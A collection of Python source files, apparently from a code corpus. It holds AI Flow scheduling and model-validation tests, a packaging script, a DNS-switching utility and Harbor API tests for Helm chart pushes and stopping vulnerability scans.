ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='bb',
sender='1-job-name',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='bb',
sender='1-job-name',
create_time=int(time.time() * 1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_event_type_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "*",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
event_type='aa',
namespace='aa',
sender='1-job-name',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
event_type='bb',
sender='1-job-name',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "aa",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
event_type='bb',
namespace='aa',
sender='1-job-name',
create_time=int(time.time() * 1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_sender_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "*",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='bb',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "aa",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='bb',
create_time=int(time.time() * 1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_key_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "*",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "aa",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1_1',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1_2',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "aa",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "aa",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1_1',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_multiple_any_config(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "*",
"event_value": "value_1",
"life": "ONCE",
"namespace": "*",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='aa',
create_time=round(time.time() * 1000))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
event: BaseEvent = BaseEvent(key='key_1_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time() * 1000))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
```
#### File: python_codes/model_validate_component/test_python_model_validate_component.py
```python
import json
import threading
import time
import unittest
from typing import List
from streamz import Stream
from ai_flow import ModelMeta, ExampleSupportType, PythonObjectExecutor, ModelType, ExecutionMode
from ai_flow.application_master.master import AIFlowMaster
from ai_flow.util.path_util import get_file_dir
from ai_flow.model_center.entity.model_version_stage import ModelVersionStage
from ai_flow.udf.function_context import FunctionContext
from python_ai_flow import ExampleExecutor, Executor
from python_ai_flow.test import test_util
import tensorflow as tf
import ai_flow as af
class ReadBatchExample(ExampleExecutor):
def execute(self, function_context: FunctionContext, input_list: List) -> List:
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data(path='mnist.npz')
return [[x_train, y_train, x_test, y_test]]
def get_compiled_model():
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
return model
class TrainBatchMnistModel(Executor):
def execute(self, function_context: FunctionContext, input_list: List) -> List:
model = get_compiled_model()
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy', 'mse'])
x_train, y_train = input_list[0][0] / 255.0, input_list[0][1]
model.fit(x_train, y_train, epochs=1)
model_meta: ModelMeta = function_context.node_spec.output_model
save_path = 'saved_models/{}'.format(round(time.time() * 1000))
model.save(save_path, save_format='tf')
af.register_model_version(model=model_meta,
model_path=save_path)
class BatchModelValidate(Executor):
def __init__(self):
super().__init__()
self.path = None
self.model_version = None
def setup(self, function_context: FunctionContext):
model_name = function_context.node_spec.model.name
notifications = af.list_events(key=model_name)
self.path = json.loads(notifications[0].value).get('_model_path')
self.model_version = json.loads(notifications[0].value).get('_model_version')
def execute(self, function_context: FunctionContext, input_list: List) -> List:
save_path = self.path
new_model_version = self.model_version
model_meta: ModelMeta = function_context.node_spec.model
serving_model_version = af.get_deployed_model_version(model_name=model_meta.name)
if serving_model_version is None:
af.update_model_version(model_name=model_meta.name, model_version=new_model_version,
current_stage=ModelVersionStage.VALIDATED)
print('the first serving model version is ', new_model_version)
else:
x_test, y_test = input_list[0][0], input_list[0][1]
model = tf.keras.models.load_model(save_path)
result = model.evaluate(x_test, y_test, verbose=2)
base_model = tf.keras.models.load_model(serving_model_version.model_path)
result_base = base_model.evaluate(x_test, y_test, verbose=2)
model_validate_result = af.register_artifact(name='model_validate',
batch_uri=get_file_dir(__file__) + '/model_batch_validate')
if function_context.job_context.execution_mode == ExecutionMode.BATCH:
file_uri = model_validate_result.batch_uri
else:
file_uri = model_validate_result.stream_uri
with open(file_uri, 'a') as f:
f.write(str(result_base) + ' -------> ' + 'previous model version: ' + serving_model_version.version)
f.write('\n')
                f.write(str(result) + ' -------> ' + 'new model version: ' + new_model_version)
f.write('\n')
if result[1] > result_base[1]:
af.update_model_version(model_name=model_meta.name,
model_version=serving_model_version.version,
current_stage=ModelVersionStage.DEPRECATED)
af.update_model_version(model_name=model_meta.name, model_version=new_model_version,
current_stage=ModelVersionStage.VALIDATED)
print('the serving model version is ', new_model_version)
else:
print('the serving model version is ', serving_model_version.version)
return []
class SourceThread(threading.Thread):
def __init__(self):
super().__init__()
self.stream = Stream()
def run(self) -> None:
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data(path='mnist.npz')
for _ in range(0, 4):
print('The example has been read {} times'.format(_ + 1))
self.stream.emit((x_train, y_train))
time.sleep(1)
class ReadStreamExample(ExampleExecutor):
def setup(self, function_context: FunctionContext):
self.thread = SourceThread()
def execute(self, function_context: FunctionContext, input_list: List) -> List:
self.thread.start()
return [self.thread.stream]
class TrainStreamMnistModel(Executor):
def __init__(self):
super().__init__()
self.path = None
def setup(self, function_context: FunctionContext):
model_name = function_context.node_spec.output_model.name
event_type = 'model_listener'
notifications = af.list_events(key=model_name)
self.path = json.loads(notifications[0].value).get('_model_path')
def execute(self, function_context: FunctionContext, input_list: List) -> List:
def sink(df):
pass
def train(df, model, sess, graph):
x_train, y_train = df[0] / 255.0, df[1]
with graph.as_default():
tf.compat.v1.keras.backend.set_session(sess)
model.fit(x_train, y_train, epochs=1)
model_meta: ModelMeta = function_context.node_spec.output_model
save_path = 'saved_models/{}'.format((round(time.time() * 1000)))
model.save(save_path, save_format='tf')
af.register_model_version(
model_id=model_meta.uuid,
model_path=save_path)
return df
while self.path is None:
pass
load_path = self.path
sess = tf.Session()
graph = tf.get_default_graph()
tf.compat.v1.keras.backend.set_session(sess)
model = tf.keras.models.load_model(load_path)
print('model update!')
data: Stream = input_list[0]
data.map(train, model, sess, graph).sink(sink)
return []
class TestModelValidateComponent(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
config_file = test_util.get_master_config_file()
cls.master = AIFlowMaster(config_file=config_file)
cls.master.start()
test_util.set_project_config(__file__)
@classmethod
def tearDownClass(cls) -> None:
cls.master.stop()
af.unset_project_config()
def tearDown(self):
TestModelValidateComponent.master._clear_db()
def test_batch_model_validate(self):
input_example_meta = af.register_example(name='batch_train_example',
support_type=ExampleSupportType.EXAMPLE_BOTH)
model_meta = af.register_model(model_name='mnist_model',
model_type=ModelType.SAVED_MODEL)
with af.config(af.BaseJobConfig(platform='local', engine='python', job_name='evaluate')):
input_example = af.read_example(example_info=input_example_meta,
executor=PythonObjectExecutor(python_object=ReadBatchExample()))
batch_train = af.train(input_data_list=[input_example],
executor=PythonObjectExecutor(python_object=TrainBatchMnistModel()),
model_info=model_meta)
model_validate = af.model_validate(input_data_list=[input_example],
model_info=model_meta,
executor=PythonObjectExecutor(python_object=BatchModelValidate()),
output_num=0)
af.stop_before_control_dependency(model_validate, batch_train)
workflow_id = af.run(test_util.get_project_path())
res = af.wait_workflow_execution_finished(workflow_id)
self.assertEqual(0, res)
```
#### File: flink-ai-extended/flink-ai-flow/setup-mini.py
```python
from shutil import copytree, rmtree
from setuptools import setup, find_packages
import os
CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))
in_source = os.path.isfile(CURRENT_DIR + "/run_tests.sh")
def remove_if_exists(file_path):
if os.path.exists(file_path):
if os.path.islink(file_path) or os.path.isfile(file_path):
os.remove(file_path)
else:
assert os.path.isdir(file_path)
rmtree(file_path)
try:
if in_source:
AIRFLOW_DIR = CURRENT_DIR + "/lib/airflow"
NOTIFICATION_SERVICE_DIR = CURRENT_DIR + "/lib/notification_service"
try:
os.symlink(AIRFLOW_DIR + "/airflow", CURRENT_DIR + "/airflow")
support_symlinks = True
except BaseException: # pylint: disable=broad-except
support_symlinks = False
if support_symlinks:
os.symlink(NOTIFICATION_SERVICE_DIR + "/notification_service",
CURRENT_DIR + "/notification_service")
else:
copytree(AIRFLOW_DIR + "/airflow", CURRENT_DIR + "/airflow")
copytree(NOTIFICATION_SERVICE_DIR + "/notification_service",
CURRENT_DIR + "/notification_service")
packages = []
for package in find_packages():
if 'airflow' not in package and 'python_ai_flow' not in package and 'flink_ai_flow' not in package:
packages.append(package)
require_file = '{}/{}'.format(os.path.dirname(os.path.abspath(__file__)), "requirements.txt")
with open(require_file) as f:
context = f.read()
require_file_lines = context.strip().split('\n')
required_packages = []
for line in require_file_lines:
if line.startswith("# Optional"):
break
if not len(line.strip()) == 0 and not line.startswith("#"):
required_packages.append(line)
setup(
name='ai_flow',
version='0.3.0',
description='This is an ai flow of the setup',
author='',
author_email='',
url='',
packages=packages,
install_requires=required_packages,
include_package_data=True,
scripts=['ai_flow/bin/start-aiflow.sh',
'ai_flow/bin/stop-aiflow.sh',
'ai_flow/bin/start_aiflow.py',
'ai_flow/bin/start_notification_service.py'],
package_data={
'': ['airflow/alembic.ini', "airflow/git_version", "*.ipynb",
"airflow/providers/cncf/kubernetes/example_dags/*.yaml"],
'airflow.serialization': ["*.json"],
}
)
finally:
if in_source:
remove_if_exists(CURRENT_DIR + "/notification_service")
remove_if_exists(CURRENT_DIR + "/airflow")
```
#### File: tests/python_codes/test_run_jobs_with_dependencies.py
```python
import time
import os
from typing import List
from ai_flow.model_center.entity.model_version_stage import ModelVersionEventType
from ai_flow.udf.function_context import FunctionContext
from python_ai_flow.user_define_funcs import Executor
from notification_service.client import NotificationClient
from notification_service.base_notification import BaseEvent
from airflow.models import DagRun
from airflow.utils.state import State
from airflow.models.taskexecution import TaskExecution
from airflow.utils.session import create_session
from base_ete_test import BaseETETest, workflow_config_file, master_port
import ai_flow as af
import flink_ai_flow as faf
class SimpleExecutor(Executor):
def execute(self, function_context: FunctionContext, input_list: List) -> List:
print("hello world!")
return []
class SendExecutor(Executor):
def __init__(self, sender, key, value, event_type, port):
super().__init__()
self.sender = sender
self.key = key
self.value = value
self.event_type = event_type
self.port = port
def execute(self, function_context: FunctionContext, input_list: List) -> List:
from notification_service.client import NotificationClient
client = NotificationClient(server_uri="localhost:{}".format(self.port),
default_namespace="default", sender=self.sender)
client.send_event(BaseEvent(key=self.key, value=self.value, event_type=self.event_type))
return []
class TestRunAIFlowJobs(BaseETETest):
def test_run_model_version_job(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
train_model = af.register_model(model_name='model_1',
model_type=af.ModelType.SAVED_MODEL,
model_desc='test model')
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
with af.config('task_3'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.model_version_control_dependency(src=executor_2,
dependency=executor_1,
model_name='model_1',
model_version_event_type=ModelVersionEventType.MODEL_GENERATED)
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
r_flag = True
while True:
with create_session() as session:
tes2 = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
if len(tes2) == 1 and r_flag:
af.register_model_version(model='model_1', model_path='/tmp/model/v1',
current_stage=af.ModelVersionStage.GENERATED)
r_flag = False
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
def test_two_jobs(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(
SendExecutor(sender='task_2',
key='key_1',
value='value_1',
event_type='UNDEFINED',
port=master_port())
))
with af.config('task_5'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.user_define_control_dependency(src=executor_2,
dependency=executor_1,
event_key='key_1',
event_value='value_1')
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
while True:
with create_session() as session:
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_5').all()
self.assertEqual(1, len(tes))
def test_two_jobs_2(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
with af.config('task_5'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.user_define_control_dependency(src=executor_2,
dependency=executor_1,
namespace='test',
event_key='key_1',
event_value='value_1',
sender='*')
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
flag = True
while True:
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
if 1 == len(tes) and flag:
client.send_event(BaseEvent(key='key_1', value='value_1'))
flag = False
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_5').all()
self.assertEqual(1, len(tes))
def test_three_jobs(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(
SendExecutor(sender='task_2',
key='key_1',
value='value_1',
event_type='UNDEFINED',
port=master_port())
))
with af.config('task_5'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(
SendExecutor(sender='task_5555',
key='key_2',
value='value_2',
event_type='UNDEFINED',
port=master_port())
))
with af.config('task_6'):
executor_3 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.user_define_control_dependency(src=executor_3,
dependency=executor_1,
event_key='key_1',
event_value='value_1')
af.user_define_control_dependency(src=executor_3,
dependency=executor_2,
event_key='key_2',
event_value='value_2',
sender='*')
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
while True:
with create_session() as session:
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_5').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_6').all()
self.assertEqual(1, len(tes))
``` |
{
"source": "jinxingxing/SmartDns",
"score": 2
} |
#### File: SmartDns/dnswitcher/__init__.py
```python
__author__ = 'JinXing'
import sys
import time
from config import load_config
from checker import pick_fastest_host, sys_ping, request_url_by_ss
from updater import update_record
from utils import logger
from functools import partial
import logging
def do_main(conf):
check_type = conf.get('check_type', 'shadowsocks')
if check_type == 'shadowsocks':
ss_config = conf['shadowsocks']
ss_checker = partial(request_url_by_ss,
server_port=int(ss_config['server_port']),
password=str(ss_config['password']),
method=str(ss_config['method']),
url=str(ss_config['check_url']),
timeout=int(ss_config.get('timeout', 5)))
checker_func = ss_checker
elif check_type == 'ping':
ping_checker = partial(sys_ping, count=10, psize=512)
checker_func = ping_checker
else:
raise ValueError('unknown check_type: %s' % check_type)
for info in conf.get("domains"):
domain = info["domain"]
hosts = info["hosts"]
logger.info(u"检查域名: %s", domain)
for i in range(3):
fastest_host = pick_fastest_host(hosts, checker_func)
logger.info(u"响应最快的主机: %s", fastest_host)
new_value = update_record(domain, fastest_host)
logger.info(u"新的记录值: %s => %s", domain, new_value)
def main():
conf_file = sys.argv[1]
conf = load_config(conf_file)
if conf.get('debug', False):
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
while 1:
try:
do_main(conf)
sleep_minute = conf.get("sleep", 30)
logger.info(u"%d 分钟后执行下一次检查", sleep_minute)
time.sleep(sleep_minute * 60)
except KeyboardInterrupt, _:
sys.exit(0)
except Exception, e:
import traceback
traceback.print_exc()
logger.info(str(e.message))
time.sleep(60)
if __name__ == "__main__":
main()
``` |
{
"source": "JinXingYoung/harbor",
"score": 2
} |
#### File: python/library/scan_all_stop.py
```python
import time
import base
import v2_swagger_client
from v2_swagger_client.rest import ApiException
class StopScanAll(base.Base):
def __init__(self):
super(StopScanAll,self).__init__(api_type="scanall")
def stop_scan_all(self, expect_status_code=202, expect_response_body=None, **kwargs):
try:
_, status_code, _ = self._get_client(**kwargs).stop_scan_all_with_http_info()
except ApiException as e:
if e.status == expect_status_code:
if expect_response_body is not None and e.body.strip() != expect_response_body.strip():
raise Exception(r"Stop scan all response body is not as expected {} actual status is {}.".format(expect_response_body.strip(), e.body.strip()))
else:
return e.reason, e.body
else:
raise Exception(r"Stop scan all result is not as expected {} actual status is {}.".format(expect_status_code, e.status))
base._assert_status_code(expect_status_code, status_code)
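# Illustrative call (hypothetical; the API tests normally pass admin credentials as kwargs):
#     StopScanAll().stop_scan_all(expect_status_code=202, **ADMIN_CLIENT)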
```
#### File: apitests/python/test_push_chart_by_helm3.7_chart_cli.py
```python
from __future__ import absolute_import
import unittest
from testutils import ADMIN_CLIENT, suppress_urllib3_warning, harbor_server, files_directory
from testutils import TEARDOWN
from library import base
from library import helm
from library.project import Project
from library.user import User
from library.repository import Repository
from library.artifact import Artifact
class TestProjects(unittest.TestCase):
user_id = None
project_push_chart_id = None
USER_CLIENT = None
project_push_chart_name = None
@suppress_urllib3_warning
def setUp(self):
self.project = Project()
self.user = User()
self.artifact = Artifact()
self.repo = Repository()
self.url = ADMIN_CLIENT["endpoint"]
self.user_push_chart_password = "<PASSWORD>"
self.chart_file_name = "harbor-helm-1.7.3"
self.chart_file_package_name = "harbor-1.7.3.tgz"
self.chart_file_path = files_directory + "harbor-helm-1.7.3.tar.gz"
self.version = "1.7.3"
self.repo_name = "harbor"
@unittest.skipIf(TEARDOWN is False, "Test data won't be erased.")
def tearDown(self):
# 1. Delete repository chart(CA) by user(UA);
self.repo.delete_repository(TestProjects.project_push_chart_name, self.repo_name, **TestProjects.USER_CLIENT)
# 2. Delete project(PA);
self.project.delete_project(TestProjects.project_push_chart_id, **TestProjects.USER_CLIENT)
# 3. Delete user(UA).
self.user.delete_user(TestProjects.user_id, **ADMIN_CLIENT)
def testPushChartByHelmChartCLI(self):
"""
Test case:
Push Chart File By Helm3.7 CLI
Test step and expected result:
1. Create a new user(UA);
2. Create a new project(PA) by user(UA);
        3. Push a chart(CA) to Harbor by helm3.7 CLI successfully;
4. List artifacts successfully;
5. Get chart(CA) by reference successfully;
6. Get addition successfully;
7. Delete chart by reference successfully.
Tear down:
1. Delete repository chart(CA) by user(UA);
2. Delete project(PA);
3. Delete user(UA).
"""
# 1. Create a new user(UA);
TestProjects.user_id, user_name = self.user.create_user(user_password=self.user_push_chart_password,
**ADMIN_CLIENT)
TestProjects.USER_CLIENT = dict(endpoint=self.url, username=user_name, password=self.user_push_chart_password)
# 2. Create a new project(PA) by user(UA);
TestProjects.project_push_chart_id, TestProjects.project_push_chart_name = self.project.create_project(
metadata={"public": "false"}, **TestProjects.USER_CLIENT)
        # 3. Push a chart(CA) to Harbor by helm3.7 CLI successfully;
command = ["tar", "zxf", self.chart_file_path]
base.run_command(command)
# 3.1 helm3_7_registry_login;
helm.helm3_7_registry_login(ip=harbor_server, user=user_name, password=self.user_push_chart_password)
# 3.2 helm3_7_package;
helm.helm3_7_package(file_path=self.chart_file_name)
# 3.2 helm3_7_push;
helm.helm3_7_push(file_path=self.chart_file_package_name, ip=harbor_server,
project_name=TestProjects.project_push_chart_name)
# 4. List artifacts successfully;
artifacts = self.artifact.list_artifacts(TestProjects.project_push_chart_name, self.repo_name,
**TestProjects.USER_CLIENT)
self.assertEqual(artifacts[0].type, 'CHART')
self.assertEqual(artifacts[0].tags[0].name, self.version)
# 5.1 Get chart(CA) by reference successfully;
artifact = self.artifact.get_reference_info(TestProjects.project_push_chart_name, self.repo_name, self.version,
**TestProjects.USER_CLIENT)
self.assertEqual(artifact.type, 'CHART')
self.assertEqual(artifact.tags[0].name, self.version)
# 6. Get addition successfully;
addition_r = self.artifact.get_addition(TestProjects.project_push_chart_name, self.repo_name, self.version,
"readme.md", **TestProjects.USER_CLIENT)
self.assertIn("Helm Chart for Harbor", addition_r[0])
addition_v = self.artifact.get_addition(TestProjects.project_push_chart_name, self.repo_name, self.version,
"values.yaml", **TestProjects.USER_CLIENT)
self.assertIn("expose", addition_v[0])
# 7. Delete chart by reference successfully.
self.artifact.delete_artifact(TestProjects.project_push_chart_name, self.repo_name, self.version,
**TestProjects.USER_CLIENT)
if __name__ == '__main__':
unittest.main()
```
#### File: apitests/python/test_stop_scan_image_artifact.py
```python
from __future__ import absolute_import
import unittest
import sys
from testutils import harbor_server, suppress_urllib3_warning
from testutils import TEARDOWN
from testutils import ADMIN_CLIENT, BASE_IMAGE, BASE_IMAGE_ABS_PATH_NAME
from library.project import Project
from library.user import User
from library.repository import Repository
from library.repository import push_self_build_image_to_project
from library.artifact import Artifact
from library.scan import Scan
from library.scan_stop import StopScan
class TestStopScan(unittest.TestCase):
@suppress_urllib3_warning
def setUp(self):
self.project= Project()
self.user= User()
self.artifact = Artifact()
self.repo = Repository()
self.scan = Scan()
self.stop_scan = StopScan()
self.url = ADMIN_CLIENT["endpoint"]
self.user_password = "<PASSWORD>"
self.project_id, self.project_name, self.user_id, self.user_name, self.repo_name1 = [None] * 5
        self.user_id, self.user_name = self.user.create_user(user_password=self.user_password, **ADMIN_CLIENT)
self.USER_CLIENT = dict(with_signature = True, with_immutable_status = True, endpoint = self.url, username = self.user_name, password = self.user_password, with_scan_overview = True)
#2. Create a new private project(PA) by user(UA);
self.project_id, self.project_name = self.project.create_project(metadata = {"public": "false"}, **ADMIN_CLIENT)
#3. Add user(UA) as a member of project(PA) with project-admin role;
self.project.add_project_members(self.project_id, user_id = self.user_id, **ADMIN_CLIENT)
@unittest.skipIf(TEARDOWN == False, "Test data won't be erased.")
def do_tearDown(self):
#1. Delete repository(RA) by user(UA);
self.repo.delete_repository(self.project_name, self.repo_name1.split('/')[1], **self.USER_CLIENT)
#2. Delete project(PA);
self.project.delete_project(self.project_id, **self.USER_CLIENT)
#3. Delete user(UA);
self.user.delete_user(self.user_id, **ADMIN_CLIENT)
def testStopScanImageArtifact(self):
"""
Test case:
Stop Scan An Image Artifact
Test step and expected result:
1. Create a new user(UA);
2. Create a new private project(PA) by user(UA);
3. Add user(UA) as a member of project(PA) with project-admin role;
4. Get private project of user(UA), user(UA) can see only one private project which is project(PA);
5. Create a new repository(RA) and tag(TA) in project(PA) by user(UA);
6. Send scan image command;
7. Send stop scan image command.
Tear down:
1. Delete repository(RA) by user(UA);
2. Delete project(PA);
3. Delete user(UA);
"""
#4. Get private project of user(UA), user(UA) can see only one private project which is project(PA);
self.project.projects_should_exist(dict(public=False), expected_count = 1,
expected_project_id = self.project_id, **self.USER_CLIENT)
#Note: Please make sure that this Image has never been pulled before by any other cases,
# so it is a not-scanned image right after repository creation.
image = "docker"
src_tag = "1.13"
#5. Create a new repository(RA) and tag(TA) in project(PA) by user(UA);
self.repo_name1, tag = push_self_build_image_to_project(self.project_name, harbor_server, self.user_name, self.user_password, image, src_tag)
#6. Send scan image command;
self.scan.scan_artifact(self.project_name, self.repo_name1.split('/')[1], tag, **self.USER_CLIENT)
#7. Send stop scan image command.
self.stop_scan.stop_scan_artifact(self.project_name, self.repo_name1.split('/')[1], tag, **self.USER_CLIENT)
self.do_tearDown()
if __name__ == '__main__':
suite = unittest.TestSuite(unittest.makeSuite(TestStopScan))
result = unittest.TextTestRunner(sys.stdout, verbosity=2, failfast=True).run(suite)
if not result.wasSuccessful():
raise Exception(r"Stop Scan test failed: {}".format(result))
``` |
{
